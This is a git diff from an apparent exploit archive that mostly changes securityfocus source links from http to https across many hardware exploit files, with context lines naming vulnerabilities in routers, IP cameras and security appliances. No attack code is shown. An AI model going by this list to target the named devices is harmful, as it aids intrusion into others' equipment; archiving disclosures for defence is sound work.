787d6c41a..1b28ffd1f 100644 --- a/exploits/hardware/remote/35762.txt +++ b/exploits/hardware/remote/35762.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/47901/info +source: https://www.securityfocus.com/bid/47901/info Cisco Unified Operations Manager is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/hardware/remote/35763.txt b/exploits/hardware/remote/35763.txt index f03a69655..682738626 100644 --- a/exploits/hardware/remote/35763.txt +++ b/exploits/hardware/remote/35763.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/47901/info +source: https://www.securityfocus.com/bid/47901/info Cisco Unified Operations Manager is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/hardware/remote/35764.txt b/exploits/hardware/remote/35764.txt index 4dbc8d101..3db13a22e 100644 --- a/exploits/hardware/remote/35764.txt +++ b/exploits/hardware/remote/35764.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/47901/info +source: https://www.securityfocus.com/bid/47901/info Cisco Unified Operations Manager is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/hardware/remote/35765.txt b/exploits/hardware/remote/35765.txt index 591c554c9..5bf835e0f 100644 --- a/exploits/hardware/remote/35765.txt +++ b/exploits/hardware/remote/35765.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/47901/info +source: https://www.securityfocus.com/bid/47901/info Cisco Unified Operations Manager is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/hardware/remote/35766.txt b/exploits/hardware/remote/35766.txt index 6b41c9bdd..769ffd832 100644 --- a/exploits/hardware/remote/35766.txt +++ b/exploits/hardware/remote/35766.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/47901/info +source: https://www.securityfocus.com/bid/47901/info Cisco Unified Operations Manager is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/hardware/remote/35779.txt b/exploits/hardware/remote/35779.txt index 9cb8c0308..8880ab171 100644 --- a/exploits/hardware/remote/35779.txt +++ b/exploits/hardware/remote/35779.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/47902/info +source: https://www.securityfocus.com/bid/47902/info CiscoWorks Common Services is prone to a cross-site scripting vulnerability because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/hardware/remote/35780.txt b/exploits/hardware/remote/35780.txt index 6233f05cc..27f710e6d 100644 --- a/exploits/hardware/remote/35780.txt +++ b/exploits/hardware/remote/35780.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/47903/info +source: https://www.securityfocus.com/bid/47903/info Cisco Unified Operations Manager is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/hardware/remote/35800.txt b/exploits/hardware/remote/35800.txt index 14b536562..f1458e4a0 100644 --- a/exploits/hardware/remote/35800.txt +++ b/exploits/hardware/remote/35800.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/47976/info +source: https://www.securityfocus.com/bid/47976/info The RXS-3211 IP camera is prone to an information-disclosure vulnerability. diff --git a/exploits/hardware/remote/35817.txt b/exploits/hardware/remote/35817.txt index 14a541fa8..8380e0e80 100644 --- a/exploits/hardware/remote/35817.txt +++ b/exploits/hardware/remote/35817.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/48085/info +source: https://www.securityfocus.com/bid/48085/info NetGear WNDAP350 wireless access point is prone to multiple remote information-disclosure issues because it fails to restrict access to sensitive information. diff --git a/exploits/hardware/remote/35925.txt b/exploits/hardware/remote/35925.txt index 7094039ef..6098015a4 100644 --- a/exploits/hardware/remote/35925.txt +++ b/exploits/hardware/remote/35925.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/48560/info +source: https://www.securityfocus.com/bid/48560/info The Portech MV-372 VoIP Gateway is prone to multiple security vulnerabilities. diff --git a/exploits/hardware/remote/35932.c b/exploits/hardware/remote/35932.c index 867575bd2..e9284c41e 100644 --- a/exploits/hardware/remote/35932.c +++ b/exploits/hardware/remote/35932.c @@ -1,4 +1,4 @@ - /* +/* ** File : satcompwn.c - [VSAT SAILOR SAT COM 900 Remote 0day] ** Author : Nicholas Lemonias ** diff --git a/exploits/hardware/remote/35970.txt b/exploits/hardware/remote/35970.txt index c51bb4f4d..0d0545a01 100644 --- a/exploits/hardware/remote/35970.txt +++ b/exploits/hardware/remote/35970.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/48711/info +source: https://www.securityfocus.com/bid/48711/info The Iskratel SI2000 Callisto 821+ is prone to a cross-site request-forgery vulnerability and multiple HTML-injection vulnerabilities. diff --git a/exploits/hardware/remote/35997.sh b/exploits/hardware/remote/35997.sh index 67882a5d2..0eadf0075 100755 --- a/exploits/hardware/remote/35997.sh +++ b/exploits/hardware/remote/35997.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/48908/info +source: https://www.securityfocus.com/bid/48908/info Sagem F@st 3304 router is prone to a remote information-disclosure vulnerability because it fails to restrict access to sensitive information. diff --git a/exploits/hardware/remote/36205.txt b/exploits/hardware/remote/36205.txt index d0d0b719d..8592a4742 100644 --- a/exploits/hardware/remote/36205.txt +++ b/exploits/hardware/remote/36205.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/49930/info +source: https://www.securityfocus.com/bid/49930/info SonicWall NSA 4500 is prone to an HTML-injection vulnerability and a session-hijacking vulnerability. diff --git a/exploits/hardware/remote/36239.txt b/exploits/hardware/remote/36239.txt index a2c6bdcdf..0e29177e9 100644 --- a/exploits/hardware/remote/36239.txt +++ b/exploits/hardware/remote/36239.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/50189/info +source: https://www.securityfocus.com/bid/50189/info Check Point UTM-1 Edge and Safe are prone to multiple security vulnerabilities, including: diff --git a/exploits/hardware/remote/36256.txt b/exploits/hardware/remote/36256.txt index b5e90baa0..592136216 100644 --- a/exploits/hardware/remote/36256.txt +++ b/exploits/hardware/remote/36256.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/50372/info +source: https://www.securityfocus.com/bid/50372/info Multiple Cisco products are prone to a directory-traversal vulnerability. diff --git a/exploits/hardware/remote/36428.txt b/exploits/hardware/remote/36428.txt index fe0cdf72a..a4cc0ee58 100644 --- a/exploits/hardware/remote/36428.txt +++ b/exploits/hardware/remote/36428.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/50968/info +source: https://www.securityfocus.com/bid/50968/info Axis M10 Series Network Cameras are prone to a cross-site scripting vulnerability because they fail to sufficiently sanitize user-supplied data. diff --git a/exploits/hardware/remote/36429.txt b/exploits/hardware/remote/36429.txt index 45dd4dd28..1c14fdfc3 100644 --- a/exploits/hardware/remote/36429.txt +++ b/exploits/hardware/remote/36429.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/50978/info +source: https://www.securityfocus.com/bid/50978/info HS2 web interface is prone to multiple security vulnerabilities: diff --git a/exploits/hardware/remote/36475.txt b/exploits/hardware/remote/36475.txt index 34c229a38..17cc26145 100644 --- a/exploits/hardware/remote/36475.txt +++ b/exploits/hardware/remote/36475.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/51156/info +source: https://www.securityfocus.com/bid/51156/info Barracuda Control Center 620 is prone to an HTML injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/hardware/remote/36511.txt b/exploits/hardware/remote/36511.txt index 2115b80be..2fc3c69f2 100644 --- a/exploits/hardware/remote/36511.txt +++ b/exploits/hardware/remote/36511.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/51301/info +source: https://www.securityfocus.com/bid/51301/info Astaro Security Gateway is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/hardware/remote/36670.txt b/exploits/hardware/remote/36670.txt index 618640c86..287bb2acb 100644 --- a/exploits/hardware/remote/36670.txt +++ b/exploits/hardware/remote/36670.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/51918/info +source: https://www.securityfocus.com/bid/51918/info D-Link ShareCenter products are prone to multiple remote code-execution vulnerabilities. diff --git a/exploits/hardware/remote/36680.txt b/exploits/hardware/remote/36680.txt index 223fb6563..6bd51af57 100644 --- a/exploits/hardware/remote/36680.txt +++ b/exploits/hardware/remote/36680.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/51922/info +source: https://www.securityfocus.com/bid/51922/info Multiple Trendnet Camera products are prone to a remote security-bypass vulnerability. diff --git a/exploits/hardware/remote/36767.html b/exploits/hardware/remote/36767.html index f57ddb481..ec3a71211 100644 --- a/exploits/hardware/remote/36767.html +++ b/exploits/hardware/remote/36767.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/51985/info +source: https://www.securityfocus.com/bid/51985/info D-Link DAP-1150 is prone to a cross-site request-forgery vulnerability. diff --git a/exploits/hardware/remote/36831.txt b/exploits/hardware/remote/36831.txt index 25d5550f2..92cc85530 100644 --- a/exploits/hardware/remote/36831.txt +++ b/exploits/hardware/remote/36831.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/52076/info +source: https://www.securityfocus.com/bid/52076/info Endian Firewall is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/hardware/remote/36832.txt b/exploits/hardware/remote/36832.txt index 5442708fe..dae2f6478 100644 --- a/exploits/hardware/remote/36832.txt +++ b/exploits/hardware/remote/36832.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/52076/info +source: https://www.securityfocus.com/bid/52076/info Endian Firewall is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/hardware/remote/36833.txt b/exploits/hardware/remote/36833.txt index dc6baf7f0..67ecce5e6 100644 --- a/exploits/hardware/remote/36833.txt +++ b/exploits/hardware/remote/36833.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/52076/info +source: https://www.securityfocus.com/bid/52076/info Endian Firewall is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/hardware/remote/36864.txt b/exploits/hardware/remote/36864.txt index 37acf42d9..de397ca3f 100644 --- a/exploits/hardware/remote/36864.txt +++ b/exploits/hardware/remote/36864.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/52098/info +source: https://www.securityfocus.com/bid/52098/info Xavi 7968 ADSL Router is prone to cross-site scripting, HTML-injection and cross-site request forgery vulnerabilities. diff --git a/exploits/hardware/remote/36866.txt b/exploits/hardware/remote/36866.txt index 0ec9ac531..3c0e78c93 100644 --- a/exploits/hardware/remote/36866.txt +++ b/exploits/hardware/remote/36866.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/52098/info +source: https://www.securityfocus.com/bid/52098/info Xavi 7968 ADSL Router is prone to cross-site scripting, HTML-injection and cross-site request forgery vulnerabilities. diff --git a/exploits/hardware/remote/36877.html b/exploits/hardware/remote/36877.html index c1f16995a..4e5253587 100644 --- a/exploits/hardware/remote/36877.html +++ b/exploits/hardware/remote/36877.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/52134/info +source: https://www.securityfocus.com/bid/52134/info The D-Link DCS-900, DCS-2000, and DCS-5300 are prone to a cross-site request-forgery vulnerability. diff --git a/exploits/hardware/remote/36931.txt b/exploits/hardware/remote/36931.txt index 3b569787d..02e6f630f 100644 --- a/exploits/hardware/remote/36931.txt +++ b/exploits/hardware/remote/36931.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/52358/info +source: https://www.securityfocus.com/bid/52358/info Barracuda CudaTel Communication Server is prone to multiple HTML-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/hardware/remote/36945.txt b/exploits/hardware/remote/36945.txt index 7feca0669..a0129c473 100644 --- a/exploits/hardware/remote/36945.txt +++ b/exploits/hardware/remote/36945.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/52424/info +source: https://www.securityfocus.com/bid/52424/info TP-LINK TL-WR740N is prone to an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/hardware/remote/36995.txt b/exploits/hardware/remote/36995.txt index 0327c0bc0..be91d4ba0 100644 --- a/exploits/hardware/remote/36995.txt +++ b/exploits/hardware/remote/36995.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/52653/info +source: https://www.securityfocus.com/bid/52653/info FirePass is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/hardware/remote/37037.txt b/exploits/hardware/remote/37037.txt index 35d412228..0b19a65e3 100644 --- a/exploits/hardware/remote/37037.txt +++ b/exploits/hardware/remote/37037.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/52881/info +source: https://www.securityfocus.com/bid/52881/info Peakflow SP is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input. diff --git a/exploits/hardware/remote/37141.txt b/exploits/hardware/remote/37141.txt index 5b7a7fb8a..2dddf4fe8 100644 --- a/exploits/hardware/remote/37141.txt +++ b/exploits/hardware/remote/37141.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/53427/info +source: https://www.securityfocus.com/bid/53427/info The Linksys WRT54GL router is prone to a cross-site request-forgery vulnerability. diff --git a/exploits/hardware/remote/37405.py b/exploits/hardware/remote/37405.py index 3df416743..d90284b15 100755 --- a/exploits/hardware/remote/37405.py +++ b/exploits/hardware/remote/37405.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/54006/info +source: https://www.securityfocus.com/bid/54006/info Edimax IC-3030iWn is prone to an information-disclosure vulnerability. diff --git a/exploits/hardware/remote/37429.txt b/exploits/hardware/remote/37429.txt index 5a8f70d2d..251f620a7 100644 --- a/exploits/hardware/remote/37429.txt +++ b/exploits/hardware/remote/37429.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/54075/info +source: https://www.securityfocus.com/bid/54075/info Mobility System Software is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input. diff --git a/exploits/hardware/remote/37512.txt b/exploits/hardware/remote/37512.txt index 2a22dfecf..94e1ccae0 100644 --- a/exploits/hardware/remote/37512.txt +++ b/exploits/hardware/remote/37512.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/54593/info +source: https://www.securityfocus.com/bid/54593/info Barracuda SSL VPN 680 is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/hardware/remote/37513.txt b/exploits/hardware/remote/37513.txt index 87d6b680d..08576be1c 100644 --- a/exploits/hardware/remote/37513.txt +++ b/exploits/hardware/remote/37513.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/54593/info +source: https://www.securityfocus.com/bid/54593/info Barracuda SSL VPN 680 is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/hardware/remote/37564.txt b/exploits/hardware/remote/37564.txt index 3e976f251..b59b03bab 100644 --- a/exploits/hardware/remote/37564.txt +++ b/exploits/hardware/remote/37564.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/54773/info +source: https://www.securityfocus.com/bid/54773/info Barracuda Email Security Service is prone to multiple HTML-injection vulnerabilities because it fails to properly validate user-supplied input. diff --git a/exploits/hardware/remote/37803.txt b/exploits/hardware/remote/37803.txt index 3ca85bb63..9b2cde92d 100644 --- a/exploits/hardware/remote/37803.txt +++ b/exploits/hardware/remote/37803.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/55570/info +source: https://www.securityfocus.com/bid/55570/info CoSoSys Endpoint Protector is prone to an insecure password generation vulnerability. diff --git a/exploits/hardware/remote/37969.txt b/exploits/hardware/remote/37969.txt index cde1670a4..311c271aa 100644 --- a/exploits/hardware/remote/37969.txt +++ b/exploits/hardware/remote/37969.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/56156/info +source: https://www.securityfocus.com/bid/56156/info FirePass SSL VPN is prone to a URI-redirection vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/hardware/remote/38020.py b/exploits/hardware/remote/38020.py index fccb22449..18f6e6507 100755 --- a/exploits/hardware/remote/38020.py +++ b/exploits/hardware/remote/38020.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/56510/info +source: https://www.securityfocus.com/bid/56510/info Multiple Huawei products are prone to a weak password encryption weakness. diff --git a/exploits/hardware/remote/38100.txt b/exploits/hardware/remote/38100.txt index 51c332044..00b86accb 100644 --- a/exploits/hardware/remote/38100.txt +++ b/exploits/hardware/remote/38100.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/56774/info +source: https://www.securityfocus.com/bid/56774/info Multiple Fortinet FortiWeb Appliances are prone to multiple cross-site scripting vulnerabilities because they fail to properly sanitize user-supplied input. diff --git a/exploits/hardware/remote/38164.py b/exploits/hardware/remote/38164.py index e4a9ad405..91273bf43 100755 --- a/exploits/hardware/remote/38164.py +++ b/exploits/hardware/remote/38164.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/57128/info +source: https://www.securityfocus.com/bid/57128/info Belkin Wireless Router is prone to a security vulnerability that may allow attackers to generate a default WPS PIN. diff --git a/exploits/hardware/remote/38233.txt b/exploits/hardware/remote/38233.txt index 47ac584e1..e0fabe813 100644 --- a/exploits/hardware/remote/38233.txt +++ b/exploits/hardware/remote/38233.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/57496/info +source: https://www.securityfocus.com/bid/57496/info F5 Networks BIG-IP is prone to an XML External Entity injection vulnerability. diff --git a/exploits/hardware/remote/38308.txt b/exploits/hardware/remote/38308.txt index 190d232d3..c3a7aa121 100644 --- a/exploits/hardware/remote/38308.txt +++ b/exploits/hardware/remote/38308.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/57877/info +source: https://www.securityfocus.com/bid/57877/info TP-LINK TL-WR2543ND is prone to multiple cross-site request-forgery vulnerabilities because the application fails to properly validate HTTP requests. diff --git a/exploits/hardware/remote/38356.txt b/exploits/hardware/remote/38356.txt index 4ca0ded07..0c8bdf97d 100644 --- a/exploits/hardware/remote/38356.txt +++ b/exploits/hardware/remote/38356.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/58290/info +source: https://www.securityfocus.com/bid/58290/info Foscam is prone to a directory-traversal vulnerability. diff --git a/exploits/hardware/remote/38389.txt b/exploits/hardware/remote/38389.txt index c4b939fde..f3bf9537a 100644 --- a/exploits/hardware/remote/38389.txt +++ b/exploits/hardware/remote/38389.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/58476/info +source: https://www.securityfocus.com/bid/58476/info Cisco Video Surveillance Operations Manager is prone to multiple security vulnerabilities, including: diff --git a/exploits/hardware/remote/38437.txt b/exploits/hardware/remote/38437.txt index 65aec2537..a702a76e9 100644 --- a/exploits/hardware/remote/38437.txt +++ b/exploits/hardware/remote/38437.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/58943/info +source: https://www.securityfocus.com/bid/58943/info Multiple Foscam IP Cameras are prone to multiple cross-site request-forgery vulnerabilities. diff --git a/exploits/hardware/remote/38464.txt b/exploits/hardware/remote/38464.txt index 4d68d03ee..4de329e01 100644 --- a/exploits/hardware/remote/38464.txt +++ b/exploits/hardware/remote/38464.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/59054/info +source: https://www.securityfocus.com/bid/59054/info Cisco Linksys EA2700 routers is prone to the following security vulnerabilities: diff --git a/exploits/hardware/remote/38481.html b/exploits/hardware/remote/38481.html index c22af372c..af47372ce 100644 --- a/exploits/hardware/remote/38481.html +++ b/exploits/hardware/remote/38481.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/59312/info +source: https://www.securityfocus.com/bid/59312/info D-Link DIR-865L is prone to a cross-site request-forgery vulnerability. diff --git a/exploits/hardware/remote/38492.html b/exploits/hardware/remote/38492.html index aa6b8f5a0..933aa442a 100644 --- a/exploits/hardware/remote/38492.html +++ b/exploits/hardware/remote/38492.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/59442/info +source: https://www.securityfocus.com/bid/59442/info The TP-Link TL-WR1043N Router is prone to a cross-site request-forgery vulnerability. diff --git a/exploits/hardware/remote/38495.html b/exploits/hardware/remote/38495.html index 0508354ad..ef4d7e6f7 100644 --- a/exploits/hardware/remote/38495.html +++ b/exploits/hardware/remote/38495.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/59476/info +source: https://www.securityfocus.com/bid/59476/info Belkin F5D8236-4 Router is prone to a cross-site request-forgery vulnerability. diff --git a/exploits/hardware/remote/38501.txt b/exploits/hardware/remote/38501.txt index 1c8685efb..bfba07f0b 100644 --- a/exploits/hardware/remote/38501.txt +++ b/exploits/hardware/remote/38501.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/59558/info +source: https://www.securityfocus.com/bid/59558/info The Cisco Linksys E1200 N300 router is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/hardware/remote/38536.txt b/exploits/hardware/remote/38536.txt index 0fb6f6df6..c02535005 100644 --- a/exploits/hardware/remote/38536.txt +++ b/exploits/hardware/remote/38536.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/60172/info +source: https://www.securityfocus.com/bid/60172/info Barracuda SSL VPN 680 is prone to an open-redirection vulnerability. diff --git a/exploits/hardware/remote/38582.html b/exploits/hardware/remote/38582.html index dc50ff532..fb03cb685 100644 --- a/exploits/hardware/remote/38582.html +++ b/exploits/hardware/remote/38582.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/60526/info +source: https://www.securityfocus.com/bid/60526/info Brickcom multiple IP cameras are prone to a cross-site request-forgery vulnerability. diff --git a/exploits/hardware/remote/38583.html b/exploits/hardware/remote/38583.html index 1a9f2b027..1dbc899a4 100644 --- a/exploits/hardware/remote/38583.html +++ b/exploits/hardware/remote/38583.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/60529/info +source: https://www.securityfocus.com/bid/60529/info Sony CH and DH series IP cameras including SNCCH140, SNCCH180, SNCCH240, SNCCH280, SNCDH140, SNCDH140T, SNCDH180, SNCDH240, SNCDH240T, and SNCDH280 are prone to multiple cross-site request-forgery vulnerabilities. diff --git a/exploits/hardware/remote/38584.txt b/exploits/hardware/remote/38584.txt index d2c4af3ac..e3d7c482f 100644 --- a/exploits/hardware/remote/38584.txt +++ b/exploits/hardware/remote/38584.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/60532/info +source: https://www.securityfocus.com/bid/60532/info Grandstream multiple IP cameras including GXV3501, GXV3504, GXV3601, GXV3601HD/LL, GXV3611HD/LL, GXV3615W/P, GXV3651FHD, GXV3662HD, GXV3615WP_HD, and GXV3500 are prone to a cross-site request-forgery vulnerability. diff --git a/exploits/hardware/remote/38591.py b/exploits/hardware/remote/38591.py index e6776de97..11d4f2df6 100755 --- a/exploits/hardware/remote/38591.py +++ b/exploits/hardware/remote/38591.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/60682/info +source: https://www.securityfocus.com/bid/60682/info TP-LINK TL-PS110U Print Server is prone to a security-bypass vulnerability. diff --git a/exploits/hardware/remote/38632.txt b/exploits/hardware/remote/38632.txt index bd46d1338..69b03f62f 100644 --- a/exploits/hardware/remote/38632.txt +++ b/exploits/hardware/remote/38632.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/61044/info +source: https://www.securityfocus.com/bid/61044/info Multiple Zoom Telephonics devices are prone to an information-disclosure vulnerability, multiple authentication bypass vulnerabilities and an SQL-injection vulnerability. diff --git a/exploits/hardware/remote/38671.txt b/exploits/hardware/remote/38671.txt index 4c498526c..a5eafd4e0 100644 --- a/exploits/hardware/remote/38671.txt +++ b/exploits/hardware/remote/38671.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/61353/info +source: https://www.securityfocus.com/bid/61353/info Barracuda CudaTel is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/hardware/remote/38692.txt b/exploits/hardware/remote/38692.txt index d0b5fb13f..637bea2fa 100644 --- a/exploits/hardware/remote/38692.txt +++ b/exploits/hardware/remote/38692.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/61733/info +source: https://www.securityfocus.com/bid/61733/info AlgoSec Firewall Analyzer is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/hardware/remote/38804.py b/exploits/hardware/remote/38804.py index 112e16ca6..ff3685f19 100755 --- a/exploits/hardware/remote/38804.py +++ b/exploits/hardware/remote/38804.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/63168/info +source: https://www.securityfocus.com/bid/63168/info Multiple Level One Enterprise Access Point devices are prone to a security bypass vulnerability. diff --git a/exploits/hardware/remote/38810.py b/exploits/hardware/remote/38810.py index 50cbe6522..b1f0001fd 100755 --- a/exploits/hardware/remote/38810.py +++ b/exploits/hardware/remote/38810.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/63234/info +source: https://www.securityfocus.com/bid/63234/info Multiple Vendors are prone to a stack-based buffer-overflow vulnerability. diff --git a/exploits/hardware/remote/38824.html b/exploits/hardware/remote/38824.html index 9c0a1f600..5a47dea2d 100644 --- a/exploits/hardware/remote/38824.html +++ b/exploits/hardware/remote/38824.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/63663/info +source: https://www.securityfocus.com/bid/63663/info FortiAnalyzer is prone to a cross-site request-forgery vulnerability because it fails to properly validate HTTP requests. diff --git a/exploits/hardware/remote/38850.txt b/exploits/hardware/remote/38850.txt index 306ea0f0a..397da9f3d 100644 --- a/exploits/hardware/remote/38850.txt +++ b/exploits/hardware/remote/38850.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/63880/info +source: https://www.securityfocus.com/bid/63880/info Thomson Reuters Velocity Analytics is prone to a vulnerability that lets attackers inject and execute arbitrary code. diff --git a/exploits/hardware/remote/38851.html b/exploits/hardware/remote/38851.html index 9867b6231..cd1110f45 100644 --- a/exploits/hardware/remote/38851.html +++ b/exploits/hardware/remote/38851.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/63908/info +source: https://www.securityfocus.com/bid/63908/info LevelOne WBR-3406TX router is prone to a cross-site request-forgery vulnerability. diff --git a/exploits/hardware/remote/39089.txt b/exploits/hardware/remote/39089.txt index 2150cf3d1..3efab52e1 100644 --- a/exploits/hardware/remote/39089.txt +++ b/exploits/hardware/remote/39089.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/65444/info +source: https://www.securityfocus.com/bid/65444/info The Netgear D6300B router is prone to the following security vulnerabilities: diff --git a/exploits/hardware/remote/39138.html b/exploits/hardware/remote/39138.html index 1fa4ae679..4e972979d 100644 --- a/exploits/hardware/remote/39138.html +++ b/exploits/hardware/remote/39138.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/66593/info +source: https://www.securityfocus.com/bid/66593/info ICOMM 610 is prone to a cross-site request-forgery vulnerability. diff --git a/exploits/hardware/remote/39154.txt b/exploits/hardware/remote/39154.txt index 2748b9dc8..812a27a63 100644 --- a/exploits/hardware/remote/39154.txt +++ b/exploits/hardware/remote/39154.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/67033/info +source: https://www.securityfocus.com/bid/67033/info Comtrend CT-5361T ADSL Router is prone to a cross-site scripting vulnerability and a cross-site request-forgery vulnerability. diff --git a/exploits/hardware/remote/39195.c b/exploits/hardware/remote/39195.c index 5cd00f01d..5a2d525ec 100644 --- a/exploits/hardware/remote/39195.c +++ b/exploits/hardware/remote/39195.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/67510/info +// source: https://www.securityfocus.com/bid/67510/info Foscam IP Camera is prone to a security-bypass vulnerability. diff --git a/exploits/hardware/remote/39209.txt b/exploits/hardware/remote/39209.txt index 42f92b96f..30519df0d 100644 --- a/exploits/hardware/remote/39209.txt +++ b/exploits/hardware/remote/39209.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/67747/info +source: https://www.securityfocus.com/bid/67747/info Huawei E303 Router is prone to a cross-site request-forgery vulnerability. diff --git a/exploits/hardware/remote/39278.txt b/exploits/hardware/remote/39278.txt index 6852b0ee8..b5c18d2e4 100644 --- a/exploits/hardware/remote/39278.txt +++ b/exploits/hardware/remote/39278.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/69028/info +source: https://www.securityfocus.com/bid/69028/info Barracuda Web Application Firewall is prone to an authentication-bypass vulnerability. diff --git a/exploits/hardware/remote/39314.c b/exploits/hardware/remote/39314.c index 904486692..86d659c14 100644 --- a/exploits/hardware/remote/39314.c +++ b/exploits/hardware/remote/39314.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/69808/info +source: https://www.securityfocus.com/bid/69808/info Aztech Modem Routers are prone to an information-disclosure vulnerability. diff --git a/exploits/hardware/remote/39316.pl b/exploits/hardware/remote/39316.pl index f709adddd..10b5747c0 100755 --- a/exploits/hardware/remote/39316.pl +++ b/exploits/hardware/remote/39316.pl @@ 